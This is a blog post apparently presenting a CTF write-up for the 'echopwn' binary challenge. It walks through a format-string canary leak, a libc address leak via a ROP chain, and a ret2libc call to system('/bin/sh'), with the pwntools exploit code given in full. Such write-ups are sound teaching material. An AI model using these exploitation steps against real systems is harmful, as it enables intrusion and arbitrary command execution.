<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Echopwn
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Echopwn" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW" />
<meta property="og:description" content="WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW" />
<link rel="canonical" href="http://0.0.0.0:4000/2020/12/01/echopwn.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2020/12/01/echopwn.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-12-01T00:00:00+01:00" />
<script type="application/ld+json">
{"headline":"Echopwn","url":"http://0.0.0.0:4000/2020/12/01/echopwn.html","datePublished":"2020-12-01T00:00:00+01:00","dateModified":"2020-12-01T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2020/12/01/echopwn.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.5vw; text-align: center"> 
                                    WNKKKNW                                     
                                 WXxc'...':d0NW                                 
                              W0d:..'cxxdl,..'cx0N                              
                           NOo;..,lOXW    WKkl,..,cxKW                          
                       WXkl'..;o0N            NKxc,..,lkXW                      
                    WKxc'..:xKW                   N0xc'..;okXW                  
                 N0d;..'lkXW                          N0dc'..:oOXW              
              NOo,..,oON                                 WNOd:'.':xX            
            Kl'..;d0N                                        WXx' .dW           
           Wo  'xX                                         WKxc'..c0            
            Ko;..,cxKN                                  W0d:..'ckXW             
              WKkl,..,lxKW                           NOo,..,lON                 
                  W0l.  .,lkKW                   WXkl'..  .:xKN                 
                N0d;..'cl:'..;okXW            WKxc...:dOOd:'..,lxKW             
             NOo,..,lONW WXOo:...;oOXW     N0d;...cxKW    WXOo:...:0W           
           WO,..;d0N         WXOo;...;ok0ko,..,lOXW           Xx' .dW           
           Wx. 'o0N              WXkl;.....;o0N           WXkl,..:xX            
            W0d:'.,cx0N              WKOkOKW           WKx:..'ckXW              
               WXOo:'.,cxKN                         N0d;. .cON                  
                  W0l.  ..,lkKW                 WNOl,..,,..'cd0N                
               N0o;..'ckOxc'..,lkKW          WKxc'..:xKWWKxl,..,cx0N            
            WOl,..;oON     N0dc'..;lkKW   WKd:..'ckXW       NKxc. .oN           
           Wx. 'o0N           WNOd:'..;lol;..,oON           WXOl..'xW           
            0:..;oOXW             WXOo:'.':d0N           WXxc'.'ckXW            
             WKxc,.':oOXW             WNNNW           WKd:..,oON                
                 N0xc,.':d0N                       N0o;..;d0N                   
                    WN0d:'.'cd0N               WXkl,.':xKW                      
                        WN0d:'.,cx0N        WKxc'.'lkXW                         
                            WXOo:'.,cxKNWN0d:..,oONW                            
                                WXOo;'.,;,..;d0N                                
                                    WXOdookKW                                   

</pre>

<hr />

<p>This was a pwn challenge finally rated with 316 points at DEKRA CTF. There was no description.</p>

<p>They give us a zip file with the binary, libc.so.6 and the dynamic linker.</p>

<hr />

<h1 id="first-execution">First execution</h1>

<p>When we first execute it we get:</p>

<blockquote>
  <p>❯ ./echopwn-bin
<br />echo&gt; hello
<br />hello
<br />echo&gt; hi</p>
</blockquote>

<p>So it looks like we put some input that is written back to us and finally put something again and the program exit.</p>

<p>The input is reflected back to us so it looks like a <strong>format string vulnerability</strong>?</p>

<blockquote>
  <p>❯ ./echopwn-bin
<br />echo&gt; %x %x %x
<br />78252078 0 a24da980
<br />echo&gt; yeah</p>
</blockquote>

<p>Yes! That worked. We can’t do anymore here. Let’s move on to the disassembler.</p>

<h1 id="reverse-all-the-things">Reverse all the things</h1>

<p>The dashboard of the binary showed us this information:</p>

<p><img src="/./assets/imgs/echopwn-dashboard.png" alt="" /></p>

<p>Wow, that looks pretty secure. Canary, NX bit, PIC…</p>

<p>If we want to make a <strong>buffer overflow</strong> we are going to need that <strong>canary</strong>. Luckly for us we know there is a <strong>format string vulnerability</strong> which will provides the solution for that problem! (At least we hope so)</p>

<p>Let’s move to the main function</p>

<p><img src="/./assets/imgs/echopwn-main.png" alt="" /></p>

<p>Nothing interesting really. Let’s check what that <strong>doRead</strong> does.</p>

<p><img src="/./assets/imgs/echopwn-doread.png" alt="" /></p>

<p>Well, we can see a <strong>printf</strong>, then a <strong>gets</strong>, another <strong>printf</strong> and finally a <strong>gets</strong> again. That matches what we saw when we first run the binary.</p>

<p>Before leaving, it checks the canary so… yeah. Obviously we are dumping that canary.</p>

<h1 id="brainstorming">Brainstorming</h1>

<p>So the question is, now what? Well, there is no hidden function which contains the flag, no file loaded, no nothing. So we have to pop a shell.</p>

<p>The easiest way is to use <strong>libc</strong> to call <strong>execve</strong> or <strong>system</strong> with <strong>/bin/sh</strong>. To do that, we need to know where libc is loaded that particular execution (remember PIC?). We can leak that address because we know we can overflow with that final gets (as well as the first one, but that’s for other purposes)</p>

<p>But remember, there is <strong>canary</strong> so first we have to dump the canary (with the first gets) so the program doesn’t break.</p>

<p><img src="/./assets/imgs/echopwn-canary.jpg" alt="" /></p>

<h1 id="lets-build-the-exploit">Let’s build the exploit</h1>

<h2 id="canary">Canary</h2>

<p>First things first: the canary. We have to dump it to put it back when we overflow. We are using the format string to dump it. Let’s fire up <strong>gdb</strong> to find the exact spot.</p>

<blockquote>
  <p>I’m also using <a href="https://github.com/hugsy/gef">GEF</a> which helps me with the debugging</p>
</blockquote>

<p>Let’s run it with:</p>

<p><code class="language-plaintext highlighter-rouge">gdb echopwn</code></p>

<p>Then:</p>

<p><code class="language-plaintext highlighter-rouge">disass doRead</code></p>

<p>Let’s put a break at the end:</p>

<p><code class="language-plaintext highlighter-rouge">b *doRead + 0x153</code></p>

<p>And run it with <code class="language-plaintext highlighter-rouge">r</code></p>

<p>Let’s put a bunch of %lx (so we don’t write over the canary):</p>

<p><img src="/./assets/imgs/echopwn-format1.png" alt="" /></p>

<p>And when we hit the breakpoint, check for $rbp - 0x8</p>

<p><img src="/./assets/imgs/echopwn-format2.png" alt="" /></p>

<p>Well, that doesn’t match any of the ones dumped. Let’s move to the next group. To access a specific item on the stack you can use: <strong>%n$lx</strong>, being <strong>n</strong> the number of the <strong>nth item</strong> on the stack so now we are sending: %5$lx %6$lx …</p>

<p>On that iteration we don’t get anything either. But finally:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo&gt; %10$lx %11$lx %12$lx %13$lx              
33312520786c2432 555500786c24 55554040 afbf17a0d8f2bb00

Breakpoint 1, 0x00005555555548c9 in doRead ()
gef➤  x/2x $rbp-0x8
0x7fffffffdbc8:	0xd8f2bb00	0xafbf17a0
</code></pre></div></div>

<p>So the canary is on the 13th position!</p>

<h2 id="dump-libc-address">Dump libc address</h2>

<p>To dump the libc address we are going to print back to us the address of a function from libc. Then, because we have the binary file (libc.so.6), we can substract the base address of that function and get the offset.</p>

<p>We have <code class="language-plaintext highlighter-rouge">gets</code> there so let’s use that function.</p>

<p>Remember! We have to redirect the execution back so the program doesn’t exit!</p>

<h2 id="pop-that-shell">Pop that shell</h2>

<p>To pop the shell, we are going to put the string ‘/bin/sh’ into the RDI register and then call the <code class="language-plaintext highlighter-rouge">system</code> function from libc.</p>

<h1 id="time-to-build-the-script">Time to build the script</h1>

<p>You know, pwntools.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">p</span> <span class="o">=</span> <span class="nf">process</span><span class="p">(</span><span class="sh">'</span><span class="s">./echopwn</span><span class="sh">'</span><span class="p">)</span>
<span class="c1">#p = remote('__________', _____)
</span><span class="n">elf</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="sh">'</span><span class="s">./echopwn</span><span class="sh">'</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="sh">'</span><span class="s">./.glibc/libc.so.6</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div>

<p>Get the canary and the address of the main function:</p>

<blockquote>
  <p>I’m also getting the rbp adddress so the stack doesn’t move to some weird address</p>
</blockquote>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sh">'</span><span class="s">AAA.%13$lx.%14$lx.%15$lx</span><span class="sh">'</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="sh">"</span><span class="p">)</span>
<span class="n">canary</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">rbp</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">main</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">3</span><span class="p">]</span>
<span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">Canary is 0x</span><span class="sh">'</span> <span class="o">+</span> <span class="n">canary</span><span class="p">.</span><span class="nf">decode</span><span class="p">())</span>
<span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">Main + 21 (0x0000000000000908) is 0x</span><span class="sh">'</span> <span class="o">+</span> <span class="n">main</span><span class="p">.</span><span class="nf">decode</span><span class="p">())</span>
<span class="n">canary</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">canary</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">main</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">main</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">rbp</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">rbp</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
</code></pre></div></div>

<p>Now, let’s get the libc base address. First, we need to find a ROP gadget to put the address of <code class="language-plaintext highlighter-rouge">gets</code> into the RDI register:</p>

<blockquote>
  <p>I used <a href="https://github.com/JonathanSalwan/ROPgadget">ROPGadget</a> to do this</p>
</blockquote>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ROPGadget <span class="nt">--binary</span> echopwn
...
0x0000000000000973 : pop rdi <span class="p">;</span> ret
0x000000000000068e : ret
...
</code></pre></div></div>

<p>We have the address, let’s send it. To calculate the binary offset, we know that the ret value is the address of the instruction in main after the <code class="language-plaintext highlighter-rouge">call doRead</code> (0x908) so if we substract the address we get to that value, we have the offset:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">binary_offset</span> <span class="o">=</span> <span class="n">main</span> <span class="o">-</span> <span class="mh">0x908</span>
<span class="n">pop_rdi</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x973</span> <span class="o">+</span> <span class="n">binary_offset</span><span class="p">)</span>

<span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">52</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">rbp</span><span class="p">)</span> <span class="o">+</span> <span class="n">pop_rdi</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">binary_offset</span> <span class="o">+</span> <span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="sh">"</span><span class="s">gets</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">binary_offset</span> <span class="o">+</span> <span class="n">elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="sh">"</span><span class="s">puts</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">binary_offset</span> <span class="o">+</span><span class="n">elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="sh">"</span><span class="s">main</span><span class="sh">"</span><span class="p">]))</span>
</code></pre></div></div>

<p>Now, the final part. Receive the address:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">glibc_dumped</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>

<span class="k">def</span> <span class="nf">pad_null_bytes</span><span class="p">(</span><span class="n">value</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">value</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">'</span><span class="se">\x00</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span><span class="nf">len</span><span class="p">(</span><span class="n">value</span><span class="p">))</span>

<span class="n">glibc_base_address</span> <span class="o">=</span> <span class="nf">u64</span><span class="p">(</span><span class="nf">pad_null_bytes</span><span class="p">(</span><span class="n">glibc_dumped</span><span class="p">))</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="sh">"</span><span class="s">gets</span><span class="sh">"</span><span class="p">]</span>
<span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">Libc is at: </span><span class="sh">'</span><span class="p">,</span> <span class="nf">hex</span><span class="p">(</span><span class="n">glibc_base_address</span><span class="p">))</span>
</code></pre></div></div>

<p>And send the final exploit to pop the shell:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sh">'</span><span class="s">AAA.%13$lx.%14$lx.%15$lx</span><span class="sh">'</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="sh">"</span><span class="p">)</span>
<span class="n">canary</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">rbp</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">.</span><span class="sh">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
<span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">Canary is 0x</span><span class="sh">'</span> <span class="o">+</span> <span class="n">canary</span><span class="p">.</span><span class="nf">decode</span><span class="p">())</span>
<span class="n">canary</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">canary</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">rbp</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">rbp</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">52</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">rbp</span><span class="p">)</span> <span class="o">+</span> <span class="n">pop_rdi</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">glibc_base_address</span> <span class="o">+</span> <span class="nf">next</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">/bin/sh</span><span class="sh">'</span><span class="p">)))</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">glibc_base_address</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="sh">"</span><span class="s">system</span><span class="sh">"</span><span class="p">]))</span>
<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p>Sweet!</p>

<p><img src="/./assets/imgs/echopwn-final.png" alt="" /></p>


        </div>
    </main>

    
    </body>
</html>